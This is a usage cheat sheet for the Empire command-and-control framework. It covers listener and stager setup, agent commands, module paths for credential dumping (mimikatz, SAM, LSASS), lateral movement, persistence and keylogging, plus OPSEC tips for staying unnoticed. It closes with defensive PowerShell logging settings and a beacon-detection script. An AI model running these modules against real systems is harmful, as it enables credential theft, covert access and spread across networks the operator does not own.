# Empire Framework Cheat Sheet

## Overview

Empire is a post-exploitation framework that includes a pure PowerShell 2.0 Windows agent and a pure Python 3 Linux/macOS agent. It provides a powerful command-and-control (C2) infrastructure for red team operations, penetration testing and adversary emulation.

**Warning:** Empire is a security testing tool that should only be used in environments where you have explicit permission to do so.
## Installation

### From GitHub

```bash
# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git
# Navigate to the directory
cd Empire
# Run the installation script
sudo ./setup/install.sh
```
### Using Docker

```bash
# Pull the Docker image
docker pull bcsecurity/empire:latest
# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest
```
### On Kali Linux

```bash
# Install from package manager
sudo apt update
sudo apt install powershell-empire
```
## Basic Usage

### Starting Empire

```bash
# Start the Empire server
sudo empire
# Start with REST API (for Starkiller)
sudo empire --rest --username <username> --password <password>
```
### Using Starkiller (GUI)

### Empire CLI Navigation

| Command | Description |
|---|---|
| help | Display help menu |
| menu | Return to the main menu |
| back | Go back one menu level |
| exit | Exit Empire |
| usemodule <module> | Select a module to use |
| usestager <stager> | Select a stager to use |
| uselistener <listener> | Select a listener to use |
| interact <agent> | Interact with an agent |
| searchmodule <term> | Search for modules |
## Listeners

### Creating a Listener

```bash
# In Empire CLI
listeners
uselistener http
set Name http_listener
set Host 192.168.1.100
set Port 8080
execute
```
### Common Listener Options

| Option | Description |
|---|---|
| Name | Name for the listener |
| Host | IP/hostname for staging |
| Port | Port for the listener |
| CertPath | Certificate path for HTTPS |
| DefaultDelay | Agent callback delay (in seconds) |
| DefaultJitter | Jitter in agent callbacks (0.0-1.0) |
| DefaultProfile | Default communication profile |
| KillDate | Date for the listener to exit (MM/DD/YYYY) |
| WorkingHours | Hours for the agent to call back (09:00-17:00) |
### Listener Management

```bash
# List all listeners
listeners
# Kill a listener
kill http_listener
# View a listener's options
info http_listener
```
## Stagers

### Generating a Stager

### Common Stager Types

| Stager | Description |
|---|---|
| windows/launcher_bat | BAT file launcher |
| windows/launcher_vbs | VBS script launcher |
| windows/launcher_powershell | PowerShell launcher |
| multi/launcher | Multi-platform launcher |
| osx/launcher | macOS launcher |
| linux/launcher | Linux launcher |
| windows/dll | DLL launcher |
| windows/macro | Office macro launcher |
| windows/hta | HTA launcher |
## Agents

### Agent Commands

```bash
# List all agents
agents
# Interact with an agent
interact C2AGENT123
# Get agent info
info
# Execute a shell command
shell whoami
# Run a PowerShell command
powershell Get-Process
# Upload a file
upload /path/to/local/file /path/on/target
# Download a file
download /path/on/target /local/path
# Take a screenshot
screenshot
# Exit agent menu
back
```
### Agent Management

```bash
# Rename an agent
rename C2AGENT123 new_name
# Kill an agent
kill C2AGENT123
# Remove an agent from the database
remove C2AGENT123
# Set sleep interval (seconds)
sleep 30
# Show system information for the current agent
sysinfo
```
## Modules

### Using Modules

```bash
# List available modules
usemodule
# Search for modules
searchmodule credentials
# Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user
# Set module options
set Username administrator
# Execute the module
execute
```
### Common Module Categories

#### Credential Access

```bash
# Dump credentials from memory
usemodule powershell/credentials/mimikatz/logonpasswords
# Dump SAM database
usemodule powershell/credentials/sam
# Dump LSASS process
usemodule powershell/credentials/credential_injection/lsass_dump
```
#### Situational Awareness

```bash
# Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user
# Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer
# Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_group
```
#### Lateral Movement

```bash
# WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi
# PSExec lateral movement
usemodule powershell/lateral_movement/invoke_psexec
# WinRM lateral movement
usemodule powershell/lateral_movement/invoke_winrm
```
#### Persistence

```bash
# Registry persistence
usemodule powershell/persistence/userland/registry
# Scheduled task persistence
usemodule powershell/persistence/userland/schtasks
# WMI persistence
usemodule powershell/persistence/elevated/wmi
```
## Advanced Features

### Malleable C2 Profiles

### OPSEC Considerations

```bash
# Set agent kill date
set KillDate 01/01/2025
# Set working hours
set WorkingHours 09:00-17:00
# Increase agent sleep time (delay, jitter)
sleep 300 30
```
### Data Exfiltration

```bash
# Use keylogging module
usemodule powershell/collection/keylogger
# Use clipboard monitoring
usemodule powershell/collection/clipboard_monitor
# Use screenshot module
usemodule powershell/collection/screenshot
```
## Troubleshooting

### Common Issues
1. **Connection Issues**

```bash
# Check if the listener is running
listeners
# Verify firewall settings
sudo iptables -L
# Check for port conflicts
netstat -tuln | grep <port>
```

2. **Agent Not Checking In**

```bash
# Verify agent is running
agents
# Check for network connectivity issues
# Verify sleep/jitter settings
```

3. **Module Execution Failures**

```bash
# Check module requirements
info
# Verify agent privileges
shell whoami
# Try running in a different process context
usemodule powershell/management/psinject
```

## Defensive Measures

### Detection Methods

- PowerShell Script Block Logging
- PowerShell Module Logging
- AMSI (Antimalware Scan Interface)
- Network traffic analysis
- Behavioural analysis

### Prevention Techniques

```powershell
# Enable PowerShell Script Block Logging (Group Policy key; create it first so Set-ItemProperty does not fail)
$sbl = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name "EnableScriptBlockLogging" -Value 1 -Type DWord
# Enable PowerShell Module Logging (a ModuleNames entry of "*" is required, or nothing is logged)
$ml = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging"
New-Item -Path "$ml\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $ml -Name "EnableModuleLogging" -Value 1 -Type DWord
Set-ItemProperty -Path "$ml\ModuleNames" -Name "*" -Value "*"
# Enable Constrained Language Mode (current session only; enforce fleet-wide with an AppLocker/WDAC policy)
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
```
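Network traffic analysis is the one detection method above that works even when host logging has been tampered with. As an added example (not part of this cheat sheet or of Empire), this Python script groups firewall log lines by source and destination and tests each flow's inter-connection gaps against the DefaultDelay/DefaultJitter sleep model from the listener options; the log format, addresses and gap values are constructed, and the uniform-jitter model is an assumption.

```python
"""Beacon-interval analysis over connection logs (added example, not Empire code).
Assumed sleep model, from the listener's DefaultDelay/DefaultJitter options: each sleep
is uniform in [delay*(1-jitter), delay*(1+jitter)], so beacon gaps cluster around delay."""
from collections import defaultdict
from datetime import datetime, timedelta
from math import sqrt
from statistics import mean, pstdev
from typing import NamedTuple

MIN_GAPS = 8   # fewer samples give an unreliable estimate
MAX_CV = 0.6   # jitter 1.0 (the maximum) gives stdev/mean = 1/sqrt(3) ~ 0.58
class Beacon(NamedTuple):
    delay: float     # estimated DefaultDelay, seconds
    jitter: float    # estimated DefaultJitter, 0.0-1.0
    cv: float        # stdev/mean of the gaps
    is_beacon: bool

def analyse_gaps(times):
    """Estimate delay and jitter from one flow's callback timestamps (None if too few)."""
    gaps = [(b - a).total_seconds() for a, b in zip(sorted(times), sorted(times)[1:])]
    if len(gaps) < MIN_GAPS or min(gaps) <= 0:
        return None
    d, sigma = mean(gaps), pstdev(gaps)
    # A uniform spread of +/- d*j around d has stdev d*j/sqrt(3), so j = sqrt(3)*sigma/d.
    j = min(sqrt(3) * sigma / d, 1.0)
    # Legitimate pollers (update checks, NTP) beacon too: a hit is a triage lead, not a verdict.
    return Beacon(d, round(j, 3), round(sigma / d, 3), sigma / d <= MAX_CV)

def parse_log(lines):
    """Group timestamps by (src, dst) from constructed 'ISO-TIME ALLOW SRC -> DST:PORT' lines."""
    flows = defaultdict(list)
    for line in lines:
        ts, _action, src, _arrow, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows

def find_beacons(lines):
    """Return {(src, dst): Beacon} for every flow whose gaps look like a C2 sleep cycle."""
    return {f: b for f, t in parse_log(lines).items() if (b := analyse_gaps(t)) and b.is_beacon}

def _constructed_lines(src, dst, gaps, start=datetime(2024, 5, 1, 9, 0, 0)):
    """Constructed firewall log lines: one connection at start, then one after each gap."""
    times = [start]
    for g in gaps:
        times.append(times[-1] + timedelta(seconds=g))
    return [f"{t.isoformat()} ALLOW {src} -> {dst}" for t in times]

# Constructed sample: an agent set to delay 60 / jitter ~0.2, and a user browsing a web site.
SAMPLE_LOG = (_constructed_lines("10.0.0.5", "192.168.1.100:8080", [55, 63, 58, 66, 52, 61, 69, 57, 60, 54, 65, 60])
              + _constructed_lines("10.0.0.7", "203.0.113.10:443", [2, 1, 340, 5, 3, 1800, 4, 2, 7200, 1, 3, 90]))
```

Run `find_beacons(SAMPLE_LOG)` on the constructed log: only the 10.0.0.5 flow is reported, with a delay estimate of 60 seconds and a jitter estimate near 0.14.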
## Resources

- [BC Security GitHub](LINK_4)
- [Empire Wiki](LINK_4)
- [Starkiller GitHub](LINK_4)
- [MITRE ATT&CK - Empire](LINK_4)

*This cheat sheet provides a complete reference for using Empire in security testing scenarios. Always make sure you have proper authorisation before using this tool in any environment.*